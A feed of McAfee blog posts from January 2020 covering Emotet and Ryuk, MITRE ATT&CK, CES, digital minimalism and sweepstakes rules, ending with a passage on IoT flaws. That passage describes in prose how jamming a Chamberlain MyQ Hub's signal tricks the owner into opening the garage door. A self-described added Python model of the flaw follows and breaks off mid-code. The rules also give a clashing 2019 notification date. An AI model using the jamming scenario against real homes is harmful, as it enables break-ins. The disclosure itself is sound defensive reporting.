  • Use caution when surfing the web.
  • Only open files and emails from trusted sources.
  • Update your browsers to the latest versions if available.
  • If you are an enterprise customer, please reference KB92329 for information on McAfee enterprise defense from this vulnerability.
  • Contact McAfee Support if you have any further questions or need assistance.

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

How Frankfurt Stopped Emotet In Its Tracks
https://www.mcafee.com/blogs/enterprise/how-frankfurt-stopped-emotet-in-its-tracks/ (Wed, 15 Jan 2020 16:00:07 +0000)


During a time when ransomware continues to bring governments around the world to a halt, one city has turned the tables, by bringing their government to a halt pre-emptively to prevent ransomware.

According to ZDNet, in late December, Frankfurt, Germany—one of the world’s biggest financial hubs—reportedly shut down its IT network after its anti-malware platform identified an Emotet infection. The reported malware gained entry when an employee clicked on a malicious email that had been spoofed to look as though it came from a city authority.

Rather than risk further spread and subsequent, more damaging infection, government authorities made the difficult decision to halt the IT network until the Emotet threat was resolved. In so doing, all of the city’s IT functions were shut down for over 24 hours—including employee email, essential apps, and all services offered through the Frankfurt.de webpage. The move paid off, however—as IT department spokesman Gunter Marr told Journal Frankfurt, no lasting damage had occurred.

“In my opinion, Frankfurt made a very brave—probably not easy—decision to shut down the network to eradicate their Emotet infection,” said John Fokker, Head of Cyber Investigations for McAfee Advanced Threat Research. “Emotet infection is a precursor to Ryuk ransomware, so I think they dodged the proverbial bullet.”

The Emotet-Ransomware Connection

In many cases, the first sign of ransomware is the ransom demand itself, alerting you that you’ve been infected and asking you to pay up. The Emotet malware works a bit differently in that it is not, in itself, ransomware. Instead, it functions like the key to a door: Emotet infects the system, and once the system is “open,” access to the Emotet-infected network can be sold to ransomware groups and other cybercriminals, who may then utilize stolen credentials and simply “walk in.” In a recent campaign, once Emotet was downloaded, it in turn downloaded the Trickbot trojan from a remote host, which stole credentials and enabled a successful Ryuk ransomware infection.

However, the same multistep process that can deliver two paydays on a single deployment of ransomware is also its Achilles’ heel. Since getting from an Emotet infection to ransomware is generally a process of two or more steps, if you can stop or eliminate Emotet at step 1, the subsequent steps toward a ransomware infection cannot occur.

While Frankfurt’s Emotet infection and the subsequent shutdown led to more than a day’s loss in productivity, massive outages and major disruption, the city should be commended on its quick and level-headed response—had they attempted to preserve business operations or opted to take a wait-and-see approach, a potential ransomware infection could have cost them millions more in lost productivity and threat mitigation.

An Ounce of Prevention …

While Frankfurt was able to intercept the Emotet botnet in time, many others were not—another attack several days before, in a town just north of Frankfurt, resulted in massive disruption when the Emotet malware led to the successful deployment of Ryuk ransomware. In other words, the best and safest way to avoid a similar fate is to prevent an Emotet infection in the first place.

There are several steps you can take to keep Emotet from establishing a stronghold in your network:

  1. Educate Your Employees: The most important step is to educate your employees on how to identify phishing and social engineering attempts. Identify email security best practices, such as hovering over a link to identify the actual destination before clicking on a link, never giving account information over email, and mandating that all suspicious emails be immediately reported.
  2. Patch Vulnerabilities: The Trickbot trojan is frequently delivered as a secondary payload to Emotet. It depends on the Microsoft Windows EternalBlue vulnerability—patching this vulnerability is an important step to securing your network.
  3. Strengthen Your Logins: If Emotet does gain entrance, it can attempt to spread by guessing the login credentials of connected users. By mandating strong passwords and two-factor authentication, you can help limit the spread.
  4. Adopt Strong Anti-Malware Protection, And Ensure It’s Configured Properly: A timely alert from a capable anti-malware system enabled Frankfurt to stop Emotet. Adopting strong endpoint protection such as McAfee Endpoint Security (ENS) is one of the most important steps you can take to help prevent Emotet and other malware. Once it’s in place, you can maximize your protection by performing periodic maintenance and optimizing configurations.

Above all, don’t fall into the trap of thinking it couldn’t happen to you. According to the McAfee Labs Threats Report, ransomware grew by 118% in just the first quarter of 2019, and several new ransomware families were detected. If the spate of recent attacks is any indication, we may see similar trends in Q1 2020.

“The demand for access to large corporate or public sector networks is very high at the moment,” Fokker explained. “Ransomware actors are constantly scanning, spearphishing, purchasing access gained from other malware infections, and obtaining log files from info-stealing malware to get a foothold into networks.”

“Every company or institution should be diligent and not ignore even the simplest breach—even if it happened more than a year ago,” Fokker said.


MITRE ATT&CK™, What’s the Big Idea?
https://www.mcafee.com/blogs/enterprise/endpoint-security/mitre-attck-whats-the-big-idea/ (Tue, 14 Jan 2020 22:09:48 +0000)


MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.” While this is a fine definition, it helps to understand the significance this framework enables.

The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate. Once you have this understanding, you can take measures to mitigate those risks.

So, in the end, ATT&CK is about risk management.

Figure: Cycle of Mitigation

ATT&CK In Action

At the MITRE ATT&CKcon 2.0 conference, industry leaders from Nationwide presented on Using Threat Intelligence to Focus ATT&CK Activities. They described the process of taking the larger ATT&CK Matrix and reducing it to a more contextual and manageable set of items they could act on, in order to mitigate the most relevant vectors for their organization.

One great aspect of ATT&CK is that the data is available for all to see. Leveraging the collective base of reports, we can build a prevalence view of the matrix. As of January 2020, there were some 266 techniques, referenced across 449 actors and tools.

Figure: MITRE ATT&CK™ Enterprise Treemap (October 2019)

Here we see that the Remote File Copy technique was used by 42% of the referenced actors and tools. Indeed, this is an important and heavily used technique present in attacks carried out by various actors including APT3 and APT38, as well as noteworthy malware attacks such as Shamoon and WannaCry, just to name a few.

MITRE ATT&CK Evaluation

In 2019, MITRE began evaluating security vendors using these techniques to measure their ability to see the activities of an adversary. The first evaluation, or Round 1, was based on an APT3-style attack and included many of the items on the treemap above. As you might expect, Remote File Copy was represented. During the evaluation, MITRE copied a DLL to a remote system (something that the Petya malware does). While several vendors were able to show telemetry for this action, thanks to MVISION EDR, McAfee was one of only two vendors that showed a Specific Behavior alert for this activity (see 7.B.1 on the technique comparison). This designation is reserved for the most descriptive of all detection categories (see Round 1 Detection Categories). For more information on McAfee’s Round 1 results, see: MITRE ATT&CK™ APT3 Assessment.

Putting It All Together

Having the necessary visibility into the actions taken by an attacker is a key component in understanding the risks an organization faces. Armed with this information, a response can be carried out and a mitigation plan created and rolled out to thwart future attacks.

MITRE ATT&CK is a great advancement in enabling organizations to characterize and subsequently manage risk.

The Top Technology Takeaways From CES 2020
https://www.mcafee.com/blogs/consumer/takeaways-from-ces-2020/ (Tue, 14 Jan 2020 22:04:55 +0000)


Another Consumer Electronics Show (CES) has come and gone. Every year, this trade show joins practically everyone in the consumer electronics industry to show off the latest and greatest cutting-edge innovations in technology. From bendable tablets to 8k TVs and futuristic cars inspired by the movie “Avatar,” CES 2020 did not disappoint. Here are a few of the key takeaways from this year’s show:

Smart home technology is driven by convenience

As usual, smart home technology made up a solid portion of the new gadgets introduced at CES. Netatmo introduced the Netatmo Smart Door Lock and Keys which use physical NFC (meaning near field communication, a technology that allows devices to communicate with each other) keys as well as digital keys for guests. In the same realm of home security, Danby’s smart mailbox called the Parcel Guard allows couriers to deliver packages directly into the anti-theft box using a code or smartphone app.

Devices integrated with Alexa technology

CES 2020 also introduced many devices integrated with Alexa technology. Kohler debuted its Moxie showerhead, complete with an Alexa-enabled waterproof Bluetooth speaker. Along with the showerhead, Alexa was also built into a Dux Swedish luxury bed to help improve users’ bedtime routines.

Smart appliances

CES is usually graced with a handful of smart appliances, and this year was no different. Bosch partnered with the recipe and meal-planning app Chefling to showcase its high-tech Home Connect Refrigerator, which uses cameras to track which food items users have stocked and suggests recipes based on that information.

Mind-reading wearables translate thoughts into digital commands

CES featured several products that let users control apps, games, and devices with their minds. Companies have developed devices that can record brain signals from sensors on the scalp or devices implanted within the brain and translate them into digital signals. For example, NextMind has created a headset that measures activity in the visual cortex and translates the user’s decision of where to focus his or her eyes into digital commands. This technology could replace remote controls, as users would be able to change channels, mute, or pause just by focusing on triangles next to each command.

Another company focused on the brain-computer interface is BrainCo. This company debuted their FocusOne headband at CES this year, complete with sensors on the forehead measuring the activity in the frontal cortex. This device is designed to measure focus by detecting the subtle electrical signals that your brain is producing. These headbands are designed to help kids learn how to focus their minds in class. BrainCo also has a prosthetic arm coming to market later this year which detects muscle signals and feeds them through an algorithm that can help it operate better over time. What’s more, this device will cost less than half of an average prosthetic.

Foldable screens are still a work-in-progress

This year’s event was colored with folding screens. However, most of these devices were prototypes without proposed ship dates. A likely reason for the lack of confidence in these devices by their manufacturers is that they are unsure if the screens will be durable enough to sell. Some of these work-in-progress devices include Dell’s Concept Ori, Intel’s Horseshoe Bend, and Lenovo’s ThinkPad X1 Fold. Nevertheless, folding devices provide a new opportunity for manufacturers to play around with device forms, such as a phone that turns into a tablet.

Cybersecurity’s role in evolving technology

As consumer technology continues to evolve, the importance of securing these newfangled devices becomes more and more apparent. According to panelists from the CES session Top Security Trends in Smart Cities, by making products “smarter,” we are also making them more susceptible to hacking. For example, the McAfee Advanced Threat Research (ATR) team recently uncovered security flaws in multiple IoT smart home devices. The first is the Chamberlain MyQ Hub, a “universal” garage door automation platform that can be hacked to cause a user’s garage door to open unintentionally. The second is the McLear NFC Ring, a household access control device used to interact with NFC-enabled door locks, which can be cloned to gain access to a user’s home.

Keep cybersecurity a top priority

Although CES 2020 has introduced many new devices aimed at making users’ lives easier, it’s important to keep a secure home as a top priority as gadgets are brought into their lives. As new McAfee research has revealed, the majority of Americans today (63%) believe that they as the consumer are responsible for their security. This could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. To feel confident bringing new technology into their homes, users are encouraged to proactively integrate online security into everyday life.

Need for increased cybersecurity protection

As the sun sets on another fabulous CES, it’s clear that technological innovations won’t be slowing down any time soon. With all of these new advancements and greater connectivity comes the need for increased protection when connected to the internet. All in all, CES 2020 showed us that as technology continues to improve and develop, security will play an ever-increasing role in protecting consumers online.

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset
https://www.mcafee.com/blogs/consumer/family-safety/less-is-more-5-ways-to-jumpstart-a-digital-minimalism-mindset/ (Sat, 11 Jan 2020 17:58:48 +0000)


Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week in our first post in this series that digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper-intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?


There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may be the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

McAfee Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 https://www.mcafee.com/blogs/consumer/perceptions-of-device-security-ces-2020/ https://www.mcafee.com/blogs/consumer/perceptions-of-device-security-ces-2020/#respond Thu, 09 Jan 2020 08:01:18 +0000 /blogs/?p=97977


From the Lifx Switch smart switch to the Charmin RollBot to Kohler Setra Alexa-connected faucets, CES 2020 has introduced new devices aimed at making consumers’ lives easier. With so much excitement and hype around these new gadgets, however, it can be challenging to make security a top priority. That’s why McAfee is urging users to keep cybersecurity top-of-mind when bringing these new devices into their home so they can protect what matters.

New McAfee research reveals that consumer perceptions of security accountability have shifted in the last couple of years. For example, the majority of Americans today (63%) stated that they as the consumer are responsible for their security while last year only 42% of Americans felt that they are responsible. This shows that users are becoming increasingly aware of how to ensure that they are protecting their privacy and identity. This year-over-year increase could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. Additionally, 65% are concerned about the security of connected devices installed in their homes, such as the Chamberlain MyQ Hub garage door opener and the McLear Smart Ring. While these devices are convenient, the McAfee Advanced Threat Research team recently revealed they contained security flaws that could allow a hacker to enter a victim’s home.

It’s important to recognize that security is a proactive effort that should be seamlessly integrated into everyday life. So, how can consumers take charge and feel confident bringing new technology into their homes while staying safe? Check out the following tips to keep in mind as our lives continue to be more connected:

  • The little things count. Hackers don’t have to be geniuses to steal your personal information. Minor habits like changing default passwords and using unique passwords can go a long way to prevent your personal information from being stolen.
  • Do your research. Look up products and their manufacturers before making a purchase. This could save you from buying a device with a known security vulnerability. If you find a manufacturer doesn’t have a history of taking security seriously, then it’s best to avoid it.
  • Use a comprehensive security solution. Use comprehensive security protection, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which can help identify malicious websites.
  • Update, update, update. When applications on your devices need updating, be sure to do it as soon as possible. Most of these updates include security patches to vulnerabilities.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Survey Methodology

McAfee commissioned 3Gem to conduct a survey of 1,000 adults in the US who regularly use electronic devices, such as phones and laptops.

The post McAfee Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 appeared first on McAfee Blogs.

Iran Cyber Threat Update https://www.mcafee.com/blogs/other-blogs/mcafee-labs/iran-cyber-threat-update/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/iran-cyber-threat-update/#respond Wed, 08 Jan 2020 21:04:04 +0000 /blogs/?p=97971


Recent political tensions in the Middle East region have led to significant speculation of increased cyber-related activities. McAfee is on a heightened state of alert to monitor the evolving threats and rapidly implement coverage across all McAfee products as intelligence becomes available. Known campaigns associated with the threat actors from this region were integrated into our products and we continue to monitor our global telemetry for any further activity.

Current activity

We are observing activity that claims to be attributable to threat actors from this region; however, distinguishing attribution between cybercrime and nation-state activity will be crucial, since the line between the two will likely blur. For example, typical cybercrime activities such as ransomware, or indeed defacements or DDoS, could well be a mask for nation-state activities.

The post Iran Cyber Threat Update appeared first on McAfee Blogs.

Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! https://www.mcafee.com/blogs/consumer/ces-2020-rt2win-sweepstakes/ https://www.mcafee.com/blogs/consumer/ces-2020-rt2win-sweepstakes/#respond Tue, 07 Jan 2020 15:55:59 +0000 /blogs/?p=97923


We’ve officially touched down in Las Vegas for CES 2020!

If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies, including IoT devices. Though these devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research from the McAfee Advanced Threat Research (ATR) team on device vulnerabilities for more information.

With the growing consumer technology landscape, we here at McAfee understand the importance of creating new solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving three [3] lucky people the chance to win an Amazon gift card. Not heading to CES this year? No problem! Simply retweet one of our contest tweets with the required hashtag between January 7th – 9th for your chance to win. Follow the instructions below to enter, and good luck!


#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • Three [3] sweepstakes tweets will be released on the following schedule, each including the hashtags #RT2Win, #Sweepstakes AND #McAfeeAtCES:
    • Tuesday, January 7, 2020 at 7:00AM PST
    • Wednesday, January 8, 2020 at 7:00AM PST
    • Thursday, January 9, 2020 at 7:00AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #McAfeeAtCES hashtags must be included to be entered.
  • Sweepstakes will end on Thursday, January 9, 2020 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday, August 28, 2019 via Twitter direct message.
  • Limit one entry per person.
1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #McAfeeAtCES” for a chance at an Amazon Gift card. Winners must be following @McAfee_Home for eligibility. One [1] winner will be selected per day, and notified by 10:00AM PT the following day, for a total of three [3] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#McAfeeAtCES RT2Win CES Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win CES Sweepstakes will be conducted from January 7th through January 9th. All entries for each day of the #McAfeeAtCES RT2Win CES Sweepstakes must be received during the time allotted for the #RT2Win CES Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win CES Sweepstakes. The #McAfeeAtCES RT2Win Sweepstakes duration is as follows:

  • Begins: Tuesday, January 7, 2020 at 7:00am PST
  • Ends: Thursday, January 9, 2020 at 11:59 PST
    • Opportunity 1: Tuesday, January 7, 2020 at 7:00AM PST
    • Opportunity 2: Wednesday, January 8, 2020 at 7:00AM PST
    • Opportunity 3: Thursday, January 9, 2020 at 7:00AM PST
  • Winners will be announced: by 10:00AM PST the following day

For the #McAfeeAtCES RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #McAfeeAtCES RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #McAfeeAtCES, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person.

Three [3] winners will be chosen for the #McAfeeAtCES RT2Win CES Sweepstakes tweet from the viable pool of entries that retweeted and included #McAfeeCES Sweepstakes. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on January 10th on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

3. Eligibility: 

McAfee’s #RT2Win CES Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the #McAfeeAtCES RT2Win CES Sweepstakes begins and live in a jurisdiction where this prize and #McAfeeAtCES RT2Win CES Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected from the eligible entries received during the days of the #McAfeeAtCES RT2Win CES Sweepstakes periods. Sponsor will select the names of three [3] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #McAfeeAtCES RT2Win CES Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by January 10, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or the prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if a potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, if a potential winner fails to return the requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prizes for the #McAfeeAtCES RT2Win CES Sweepstakes are two [2] $100 Amazon e-gift cards and a one [1] $200 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 and $200 USD; the total ARV of all gift cards is $400 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #McAfeeAtCES RT2Win CES Sweepstakes, or by any technical or human error, which may occur in the processing of the #McAfeeAtCES RT2Win CES Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #McAfeeAtCES RT2Win CES Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #McAfeeAtCES RT2Win CES Sweepstakes -related activity, or participation in the #McAfeeAtCES RT2Win CES Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize #McAfeeAtCES RT2Win CES Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #McAfeeAtCES RT2Win CES Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

12. Privacy Policy: 

Personal information obtained in connection with this #RT2Win CES Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before January 10th 2021 to the address listed below, Attn: #RT2Win at CES Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! appeared first on McAfee Blogs.

What You Need to Know About the Latest IoT Device Flaws https://www.mcafee.com/blogs/consumer/ces-2020-atr-iot-device-flaws/ https://www.mcafee.com/blogs/consumer/ces-2020-atr-iot-device-flaws/#respond Tue, 07 Jan 2020 05:01:58 +0000 /blogs/?p=97921


The McAfee Advanced Threat Research (ATR) team recently uncovered a security flaw in a popular connected garage door opener and a security design issue in an NFC (meaning near field communication, which is a technology that allows devices to communicate with each other) smart ring used to unlock doors. As we head into CES 2020, the global stage where innovators showcase the next generation of consumer technologies, let’s take a look at these new security flaws and discover how users can connect securely and with confidence.

Review Chamberlain IoT device

The McAfee ATR team recently investigated the Chamberlain MyQ Hub, a “universal” garage door automation platform. The Hub acts as a new garage door opener, similar to the one that you would have in your car. However, the McAfee ATR team discovered an inherent flaw in the way the MyQ Hub communicates over radio frequency signals. It turns out that hackers can “jam” the radio frequency signals while the garage is being remotely closed. How? By jamming or blocking the code signal from ever making it to the Hub receiver, the remote sensor will never respond with the closed signal. This delivers an error message to the user, prompting them to attempt to close the door again through the app, which actually causes the garage door to open.

How can the Chamberlain IoT device be hacked?

Let’s break it down:

  • Many users enjoy using the MyQ Hub for the convenience of package delivery, ensuring that their packages are safe from porch pirates and placed directly in the garage by the carrier.
  • However, an attacker could wait for a package delivery using the connected garage door opener. The hacker could then jam the MyQ signal once the carrier opens the door and prompt an error message for the user. If and when the user attempts to close the door, the door will open and grant the attacker access to the home.
  • An attacker could also wait and see when a homeowner physically leaves the premises to jam the MyQ signal and prompt the error message. This would potentially allow further access into the home.
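The jam-and-retry failure described above, modelled as an added example (constructed here, not Chamberlain’s or McAfee’s code): a hub that sends a TOGGLE and presents a lost sensor report as “try again” ends up reopening the door, while a hub that reads the sensor before actuating and refuses to act on an unknown state does not. The TOGGLE-only opener interface, the hub’s reliance on the sensor report, and the HardenedHub mitigation are assumptions of this example, not a description of the product or of any vendor fix.

```python
"""Constructed model of the jam-and-retry failure described above.

Added illustration, not Chamberlain's or McAfee's code. Assumptions
(labelled): the opener understands only a TOGGLE pulse, the hub learns the
door's position solely from the remote sensor's RF report, and jamming
simply drops that report. The HardenedHub mitigation is a suggestion of
this example, not a description of any vendor fix.
"""
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Tuple


@dataclass
class Door:
    """Physical door behind a TOGGLE-only opener interface (assumed)."""
    is_open: bool = True
    observers: List[Callable[["Door"], None]] = field(default_factory=list)

    def toggle(self) -> None:
        self.is_open = not self.is_open
        for notify in self.observers:      # lets the scenario react to motion
            notify(self)


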